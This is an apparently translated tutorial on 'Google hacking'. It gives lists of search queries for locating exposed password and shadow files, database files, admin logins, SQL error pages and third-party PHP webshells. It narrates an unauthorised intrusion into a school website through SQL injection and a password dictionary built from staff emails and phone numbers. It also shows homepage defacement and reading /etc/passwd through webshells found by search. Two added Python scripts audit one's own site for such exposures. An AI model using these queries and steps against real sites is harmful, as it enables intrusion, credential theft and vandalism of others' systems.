Google Advanced Skills - Google Hacking

Source: Internet
Author: User
Google Hacking is actually nothing new. At the time I did not pay much attention to this technique, thinking that finding webshells and the like with it had little practical use. Google Hacking is not that simple...

  Common Google keywords:

foo1 foo2 (implicit AND: both terms must appear, e.g. searching for "XX Company" together with "XX beauty")

operator:foo (the general form of a search operator)

filetype:123 (files of type 123)

site:foo.com is more interesting than browsing the website directly and can turn up a lot of unexpected information.

intext:foo

intitle:foo (search in the page title)

allinurl:foo searches for all links related to the XX website. (Essential)

link:foo. You only need to know its link.

allintitle:foo.com

We can use "-" and "+" to adjust search accuracy.

Search for passwords directly (quotes indicate an exact search):

Of course, we can also run a secondary search over the results above.

"index of" htpasswd / passwd

filetype:xls username password email

"ws_ftp.log"

"config.php"

allinurl:admin mdb

service filetype:pwd ... or a pcAnywhere password file suffix such as "cif"

More and more interesting, and more sensitive information:

"robots.txt" "disallow:" filetype:txt

inurl:_vti_cnf (the key index of FrontPage; the CGI list of most scanners has an entry for it)

allinurl:/msadc/samples/selector/showcode.asp

http://www.cnblogs.com/../passwd

/examples/jsp/snp/snoop.jsp

phpsysinfo

intitle:"index of" /admin

intitle:"documetation"

inurl:5800 (the VNC port), inurl:desktop, and similar searches on multiple keywords

webmin port 10000

inurl:/admin/login.asp

intext:"powered by gbook365"

intitle:"php shell*" "enable stderr" filetype:php directly searches for PHP webshells

foo.org filetype:inc

ipsec filetype:conf

intitle:"error occurred" ODBC request WHERE (select|insert) (to put it bluntly, this lets you look for database queries directly; with SQL injection so popular now, it comes in handy)

"dumping data for table" username password

intitle:"Error using Hypernews"

"server software"

intitle:"http_user_agent=googlebot"

"http_user_agent=googlebot" THS admin

filetype:doc site:.mil classified

  Check multiple keywords:

intitle:config confixx login password

"mydomain.com" nessus report

"report generated"

"ipconfig"

"winipconfig"

Using the Google cache (heh, the most influential part of all): we recommend searching with "all websites" selected.

Special recommendation: things related to administrator users, such as names and birthdays ...... these can also be used as a dictionary.

......

  A collection of tips:

1) index.of.password

2) filetype:blt "buddylist"

3) "access denied for user" "using password"

4) intitle:"index of" inurl:ftp (pub | incoming)

5) "http://*:*@www" domainname

6) filetype:cnf inurl:_vti_pvt access.cnf

7) auth_user_file.txt

8) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"

9) the master list

10) inurl:"install/install.php"

11) allinurl:admin mdb

12) intitle:"welcome.to.squeezebox"

13) passlist.txt (a better way)

14) intext:""bitboard v2.0" bitshifters bulletin board"

15) "a syntax error has occurred" filetype:ihtml

16) intitle:login intext:"rt is ? copyright"

17) "#-FrontPage-" inurl:service.pwd

18) ext:php program_listing intitle:mythweb.program.listing

19) ORA-00921: unexpected end of SQL command

20) intitle:index.of abyss.conf

Simple implementation of Google Hacking

Some Google syntax can be used to give us more information (and, of course, to give those who attack more of what they want). The following describes some common syntax.

  Intext:

This uses a string in the body of the web page as the search condition. For example, entering intext:Net in Google returns all pages whose body contains "Net". allintext: is similar to intext:.

  Intitle:

Similar to intext above, this searches for whether the page title contains the string we are looking for. For example, searching intitle:"Security Angel" returns all pages whose title contains "Security Angel". Similarly, allintitle: is like intitle:.

  Cache:

Searches for Google's cached copy of some content; sometimes you can find some good stuff there.

  Define:

Searches for the definition of a word. Searching define:hacker returns the definition of hacker.

  Filetype:

I recommend using this to collect information about specific targets, whether for a web attack or for what we will talk about later. It searches for files of the specified type. For example, entering filetype:doc returns the URLs of all files ending in .doc. Of course, looking for .bak, .mdb or .inc also works, and may turn up even more information :)

  Info:

Queries the basic information of a specified site.

  Inurl:

Searches for the specified string in the URL. For example, entering inurl:admin returns N links of the form http://www.xxx.com/xxx/admin. This is handy for finding admin URLs. allinurl: is similar to inurl:, but multiple strings can be specified.

  Link:

For example, searching link:www.4ngel.net returns all URLs linking to www.4ngel.net.

  Site:

This is also useful. For example, site:www.4ngel.net returns all URLs belonging to the 4ngel.net site.

  There are also some operators that are useful:

+ Includes words that Google would otherwise ignore in the query

- Excludes a word

~ Synonyms of a word

. Single-character wildcard

* Wildcard standing for multiple characters

"" Exact query

Let's move on to the actual applications.

The following searches are done on Google. For an attacker doing testing, the password file is probably the most interesting thing. Google's powerful search capability, however, often exposes sensitive information to them. Use Google to search for the following:

intitle:"index of" etc

intitle:"index of" .sh_history

intitle:"index of" .bash_history

intitle:"index of" passwd

intitle:"index of" people.lst

intitle:"index of" pwd.db

intitle:"index of" etc/shadow

intitle:"index of" spwd

intitle:"index of" master.passwd

intitle:"index of" htpasswd

"#-FrontPage-" inurl:service.pwd

Sometimes, for various reasons, important password files are exposed on the network without protection. If someone with ulterior motives obtains them, the harm is great. You can also use Google to search for programs with vulnerabilities. For example, when a source-code disclosure vulnerability was found in Zeroboard some time ago, you could use Google to find the websites running that program:

intext:zeroboard filetype:php

Or use:

inurl:outlogin.php?_zb_path= site:.jp

to find the pages we need. phpMyAdmin is a powerful piece of database management software. Because some sites are misconfigured, phpMyAdmin can be operated directly without a password. We can use Google to search for program URLs with this weakness:

intitle:phpMyAdmin intext:"Create new database"

Using Google you may also still find many antique-grade machines like http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?dir. We can likewise use it to find pages with other CGI vulnerabilities:

allinurl:winnt system32

As mentioned above, Google can be used to search for database files. Some syntax lets us search more precisely for more information (Access databases, MSSQL and MySQL connection files, etc.). For example:

allinurl:bbs data

filetype:mdb inurl:database

filetype:inc conn

inurl:data filetype:mdb

intitle:"index of" data // This often occurs on misconfigured Apache + Win32 servers.

By the same principle, we can also use Google to find admin backends.
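The listings above (password files, FrontPage internals, .inc and .mdb database files) are just as useful for finding such files on a site you administer before a search engine indexes them. As an added example that is not part of the original article, the Python script below audits a URL inventory (your own sitemap or crawl output) against those artifacts; the rule names, the example.test host and the sample inventory are all constructed.

```python
import re
from urllib.parse import urlparse

# Path patterns for the artifacts named in the dork lists above. Rule names
# are hypothetical; a defender runs this over an inventory of their OWN
# site's URLs (sitemap or crawl) before a search engine indexes them.
SENSITIVE_RULES = [
    ("frontpage service.pwd", re.compile(r"(^|/)service\.pwd$", re.I)),
    ("frontpage internals", re.compile(r"/_vti_(pvt|cnf|bin)/", re.I)),
    ("unix credential file",
     re.compile(r"(^|/)(passwd|shadow|master\.passwd|spwd|pwd\.db)$")),
    ("shell history", re.compile(r"(^|/)\.(sh|bash)_history$")),
    ("htpasswd file", re.compile(r"(^|/)\.?htpasswd$", re.I)),
    ("ws_ftp log", re.compile(r"(^|/)ws_ftp\.log$", re.I)),
    ("database / include file", re.compile(r"\.(mdb|inc|bak)$", re.I)),
]

def classify_path(path):
    """Return the first rule name matching this URL path, else None."""
    for name, pattern in SENSITIVE_RULES:
        if pattern.search(path):
            return name
    return None

def find_exposed_paths(urls):
    """Return (url, reason) for every inventory URL matching a rule."""
    findings = []
    for url in urls:
        reason = classify_path(urlparse(url).path)
        if reason:
            findings.append((url, reason))
    return findings

# Constructed sample inventory (example.test is not a real host):
# ordinary pages that must not be flagged, mixed with exposures.
SAMPLE_INVENTORY = [
    "http://example.test/index.html",
    "http://example.test/docs/report.doc",
    "http://example.test/passwords/guide.html",
    "http://example.test/etc/passwd",
    "http://example.test/home/alice/.bash_history",
    "http://example.test/_vti_pvt/service.pwd",
    "http://example.test/data/forum.mdb",
    "http://example.test/inc/conn.inc",
]

if __name__ == "__main__":
    for url, reason in find_exposed_paths(SAMPLE_INVENTORY):
        print(f"{reason:24} {url}")
```

Anything the script reports should be removed from the web root or blocked at the server before it ever appears in an "index of" result.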

Google can be used both to collect information about a site and to penetrate it. Next we use Google to test a specific site.

First, use Google to check some basic information about the site (some details are omitted):

site:xxxx.com

From the returned results we find the domain names of several school departments:

http://a1.xxxx.com

http://a2.xxxx.com

http://a3.xxxx.com

http://a4.xxxx.com

By the way, a ping shows they sit on different servers. Schools generally have a lot of good information, so first check whether there is anything good:

site:xxxx.com filetype:doc

We get n good doc files.

Next, look for the website's admin backend address:

site:xxxx.com intext:management

site:xxxx.com inurl:login

site:xxxx.com intitle:management

More than two admin backend addresses turn up:

http://a2.xxxx.com/sys/admin_login.asp

http://a3.xxxx.com:88/_admin/login_in.asp

Pretty good. Let's see what programs run on the servers:

site:a2.xxxx.com filetype:asp

site:a2.xxxx.com filetype:php

site:a2.xxxx.com filetype:aspx

site:a3.xxxx.com filetype:asp

site:.......

......

The a2 server runs IIS with ASP, plus a PHP forum.

The a3 server is also IIS, with ASPX and ASP. The web programs all appear to be developed in-house. Since there is a forum, let's see whether any public FTP account or the like has been posted:

site:a2.xxxx.com intext:ftp://*:*

Nothing of value found. Next, check whether there are any upload vulnerabilities:

site:a2.xxxx.com inurl:file

site:a3.xxxx.com inurl:load

A file upload page is found on a2:

http://a2.xxxx.com/sys/uploadfile.asp

I checked it in IE and had no access permission. Try injection:

site:a2.xxxx.com filetype:asp

Get the addresses of n ASP pages and let the tool do the grunt work. This program obviously does not guard against injection. The db_owner permission is not high, but it is enough, although getting a shell from it is not very pleasant.

Also, the database looks fairly large, and the web administrator's password is directly exposed, though it is stored as an MD5 hash. In general, passwords on school sites are fairly regular, usually the domain name plus some variation on a phone number, so let's use Google for that:

site:xxxx.com // get N second-level domain names

site:xxxx.com intext:*@xxxx.com // get n email addresses and the names of their owners

site:xxxx.com intext:"phone number" // n

Build a dictionary from this information and then run it slowly. After a while I had recovered four accounts: two from the student union, one administrator, and one possibly a teacher's account. Login:

Name: website administrator

Pass: a2xxxx7619 // that is, the domain name + 4 digits

How to escalate privileges is not discussed in this article.

During this time I looked at some Google hacking research sites outside China. In fact, almost all of it comes down to flexible use of a few basic syntaxes, or combining them with a script vulnerability; mainly it depends on flexible thinking. Abroad there are not many defenses against Google hacking either, which is why this still works today, so don't go messing around with it. Web administrators running Apache on Windows should pay particular attention to this: an intitle:"index of" search turns up almost everything :)
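The intitle:"index of" searches the article relies on match the listing pages that Apache's mod_autoindex (and IIS directory browsing) generate for directories without an index file. As an added example, not from the original article, the Python code below detects such listings in responses fetched from your own site and reports what each one exposes, so the directories can be closed off (Options -Indexes in Apache); the sample responses are constructed.

```python
import re

# Signatures of server-generated directory listings (Apache mod_autoindex,
# IIS directory browsing): an "Index of /path" title plus a "Parent Directory"
# link. This is exactly what intitle:"index of" searches latch onto.
INDEX_TITLE = re.compile(r"<title>\s*Index of\s+/", re.I)
PARENT_LINK = re.compile(r"Parent Directory", re.I)

def is_directory_listing(body):
    """True if an HTTP response body looks like an auto-index page."""
    return bool(INDEX_TITLE.search(body) and PARENT_LINK.search(body))

def listed_entries(body):
    """File names the listing exposes: relative hrefs, minus the sort links
    (?C=N;O=D) and the parent-directory link."""
    names = re.findall(r'<a href="([^"?/][^"]*)"', body, re.I)
    return [n for n in names if n not in ("..", "../")]

def audit_responses(responses):
    """responses: iterable of (path, status, body) fetched from your own
    site. Returns {path: [entries]} for every path that serves a listing,
    i.e. the directories to close (Apache: Options -Indexes)."""
    findings = {}
    for path, status, body in responses:
        if status == 200 and is_directory_listing(body):
            findings[path] = listed_entries(body)
    return findings

# Constructed sample responses, not captured from a real server.
SAMPLE_RESPONSES = [
    ("/", 200, '<html><head><title>Welcome</title></head>'
               '<body><a href="news.html">News</a></body></html>'),
    ("/data/", 200,
     '<html><head><title>Index of /data</title></head><body>'
     '<h1>Index of /data</h1><a href="?C=N;O=D">Name</a>'
     '<a href="/">Parent Directory</a>'
     '<a href="forum.mdb">forum.mdb</a>'
     '<a href="conn.inc">conn.inc</a></body></html>'),
    # A listing that is already forbidden is not reported.
    ("/admin/", 403, "<title>Index of /admin</title>Parent Directory"),
]

if __name__ == "__main__":
    for path, entries in audit_responses(SAMPLE_RESPONSES).items():
        print(f"{path} exposes: {', '.join(entries)}")
```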

1. Search for PHP webshells

intitle:"php shell*" "enable stderr" filetype:php

(Note: intitle searches the page title; "enable stderr" refers to the Unix standard error stream; filetype is the file type.) In the search results you can find many command-line web shells. If the phpshell you find cannot be used, or you are not familiar with Unix, you can just look at the file listing; it is not covered in detail here, but it is quite useful. Note that some of the foreign phpshells found here use Unix commands, all through functions that call the system (in fact Baidu and other search engines can also be used, only with different search terms). Such a phpwebshell can run echo directly (a commonly used Unix command). One line:

echo "summon" > index.jsp

Now look at the homepage: it has been changed to "summon".

We can also use wget to upload a file (for example, the page you want to replace). Execute the command and enter cat file > index.html or echo "" > file

echo "test" > file

In this way the site homepage is replaced. You can also run:

uname -a; cat /etc/passwd

However, note that some webshell programs cannot execute commands due to various problems.

2. Search for sensitive information in .inc files

In the Google search box, enter:

.org filetype:inc
